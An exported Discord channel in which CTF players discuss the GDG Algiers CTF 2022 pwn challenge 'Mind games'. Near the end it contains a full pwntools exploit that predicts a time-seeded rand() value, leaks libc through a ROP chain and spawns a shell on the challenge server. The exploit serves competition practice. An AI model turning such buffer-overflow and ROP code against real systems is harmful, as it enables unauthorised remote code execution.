Guild icon
Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-pwn-mind-games
Avatar
Sutx BOT 10/08/2022 11:00 AM
Mind games - 500 points
Category: Pwn Description: > Help! This program is playing mind games with me!
You need to put an end to this madness.
Note: The binary is already patched to use the provided library and linker. Author : chenx3n Files:Tags: No tags.
10/08/2022 11:00 AM
Sutx pinned a message to this channel. 10/08/2022 11:00 AM
Avatar
Sutx BOT 10/08/2022 11:02 AM
@crazyman ai wants to collaborate 🤝
Avatar
Sutx BOT 10/08/2022 11:40 AM
@Piers wants to collaborate 🤝
Avatar
Piers 10/08/2022 11:42 AM
ok this challenge just requires good network lol
🤣 1
11:42
dissapointing finale
Avatar
sahuang 10/08/2022 11:42 AM
whats the case when pwn needs good network? except bruting
Avatar
Piers 10/08/2022 11:43 AM
it uses time(0) for seed
Avatar
sahuang 10/08/2022 11:43 AM
oh
11:43
well you can brute +-10 right?
Avatar
Piers 10/08/2022 11:43 AM
well i have 1 try
Avatar
sahuang 10/08/2022 11:43 AM
ah
Avatar
Piers 10/08/2022 11:43 AM
lemmy try some delay
11:43
and see if i can hit it once
Avatar
sahuang 10/08/2022 11:43 AM
ic
Avatar
Sutx BOT 10/08/2022 1:24 PM
@god lives in my skin wants to collaborate 🤝
Avatar
Sutx BOT 10/08/2022 6:48 PM
@4n0nym4u5 wants to collaborate 🤝
Avatar
Sutx BOT 10/08/2022 8:29 PM
@IceCreamMan wants to collaborate 🤝
Avatar
IceCreamMan 10/08/2022 8:29 PM
is it possible to brute force? HAHA
Avatar
Avatar
Piers
and see if i can hit it once
IceCreamMan 10/08/2022 8:29 PM
seems hard ..
20:32
btw whats the flag format?
Avatar
Piers 10/08/2022 8:32 PM
nah dont need to
20:32
Sth sth erudite
Avatar
Avatar
Piers
nah dont need to
IceCreamMan 10/08/2022 8:32 PM
its possible to get same time on local? I cant seem to hit the same time on local
Avatar
Piers 10/08/2022 8:35 PM
possible
20:36
idk why i had a working exploit locally but not remotely
Avatar
Sutx BOT 10/08/2022 8:37 PM
@Zafirr wants to collaborate 🤝
Avatar
Zafirr 10/08/2022 8:45 PM
ok i got it, had to run it on my vps
Avatar
Avatar
Zafirr
used /ctf solve
Sutx BOT 10/08/2022 8:45 PM
✅ Challenge solved.
Avatar
Piers 10/08/2022 8:46 PM
can i see your exploit?
20:46
dont know why mine failed
Avatar
Zafirr 10/08/2022 8:47 PM
from pwn import* import ctypes libc = ELF('libc.so.6') # p = process('./mind-games', env={"LD_PRELOAD": libc.path}) p = remote("pwn.chal.ctf.gdgalgiers.com", 1404) LIBC = ctypes.cdll.LoadLibrary('libc.so.6') LIBC.srand(LIBC.time(0)) ans = LIBC.rand() print(ans) flag = 0x4012d6 ret = 0x401361 printf_plt = 0x401150 got = 0x404030 pop_rdi = 0x00000000004014c3 main = 0x401362 p.sendlineafter("mind?", str(ans).rjust(16, "0").encode() + p64(ret)*10 + p64(pop_rdi) + p64(got) + p64(printf_plt) + p64(ret) + p64(main)) libc_leak = u64(p.recvuntil("\x7f")[-6:] + b'\x00\x00') print(hex(libc_leak)) libc_base = libc_leak - 0x08ec50 system = libc_base + 0x0000000000055410 bin_sh = libc_base + 0x1b75aa LIBC.srand(LIBC.time(0)) ans = LIBC.rand() print(ans) p.sendlineafter("mind?", str(ans).rjust(16, "0").encode() + p64(ret)*10 + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(ret) + p64(main)) p.interactive()
❤️ 1
Avatar
Piers 10/08/2022 8:51 PM
yeah still dont know why 😶
Avatar
Zafirr 10/08/2022 8:51 PM
probably just network issues
Avatar
Piers 10/08/2022 8:51 PM
yeah maybe
Exported 35 message(s)